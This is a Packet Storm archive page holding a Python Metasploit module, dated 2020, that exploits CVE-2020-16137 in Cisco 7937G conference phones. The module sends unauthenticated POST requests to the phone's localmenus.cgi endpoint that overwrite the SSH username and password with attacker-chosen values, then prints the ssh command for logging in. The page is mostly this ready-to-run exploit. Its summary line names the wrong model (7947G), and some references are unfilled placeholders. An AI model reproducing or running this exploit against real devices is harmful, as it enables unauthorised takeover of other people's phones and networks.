exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco 7937G Privilege Escalation

Cisco 7937G Privilege Escalation
Posted Aug 10, 2020
Authored by Cody Martin

Cisco 7947G versions SIP-1-4-5-7 and below privilege escalation exploit.

tags | exploit
systems | cisco
advisories | CVE-2020-16137
SHA-256 | 34708347a6cf94b31172406fb4db70445cf77dffd562fe392a73bb2f32ce2da0

Cisco 7937G Privilege Escalation

Change Mirror Download
# Exploit Title: Cisco 7937G Prvilege Escalation MSF Module
# Date: 2020-08-10
# Exploit Author: Cody Martin
# Vendor Homepage: https://cisco.com
# Version: <=SIP-1-4-5-7
# Tested On: SIP-1-4-5-5, SIP-1-4-5-7
# CVE: CVE-2020-16137

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# standard modules
import logging

# extra modules
dependency_missing = False

try:
import requests
except ImportError:
dependency_missing = True

from metasploit import module


metadata = {
'name': 'Cisco 7937G SSH Privilege Escalation',
'description': '''
Sets SSH credentials to whatever is supplied.
''',
'authors': [
'Cody Martin'
],
'date': '2020-06-02',
'license': 'GPL_LICENSE',
'references': [
{'type': 'url', 'ref': '<url>'},
{'type': 'cve', 'ref': '2020-#'},
{'type': 'edb', 'ref': '#'}
],
'type': 'single_scanner',
'options': {
'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': ''},
'USER': {'type': 'string', 'description': 'Desired username', 'required': True, 'default': ''},
'PASS': {'type': 'string', 'description': 'Desired password', 'required': True, 'default': ''},
'TIMEOUT': {'type': 'int', 'description': 'Timeout in seconds', 'required': True, 'default': 5}
}
}


def run(args):
module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
if dependency_missing:
logging.error('Module dependency (requests) is missing, cannot continue')
return

# Exploit
url = "http://{}/localmenus.cgi".format(args['rhost'])
payload_user = {"func": "403", "set": "401", "name1": args['USER'], "name2": args['USER']}
payload_pass = {"func": "403", "set": "402", "pwd1": args['PASS'], "pwd2": args['PASS']}
logging.info("FIRING ZE MIZZLES!")
try:
r = requests.post(url=url, params=payload_user, timeout=int(args['TIMEOUT']))
if r.status_code != 200:
logging.error("Device doesn't appear to be functioning or web access is not enabled.")
return

r = requests.post(url=url, params=payload_pass, timeout=int(args['TIMEOUT']))
if r.status_code != 200:
logging.error("Device doesn't appear to be functioning or web access is not enabled.")
return
except requests.exceptions.RequestException:
logging.error("Device doesn't appear to be functioning or web access is not enabled.")
return

logging.info("SSH attack finished!")
logging.info(("Try to login using the supplied credentials {}:{}").format(args['USER'], args['PASS']))
logging.info("You must specify the key exchange when connecting or the device will be DoS'd!")
logging.info(("ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 {}@{}").format(args['USER'], args['rhost']))

return


if __name__ == "__main__":
module.run(metadata, run)
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close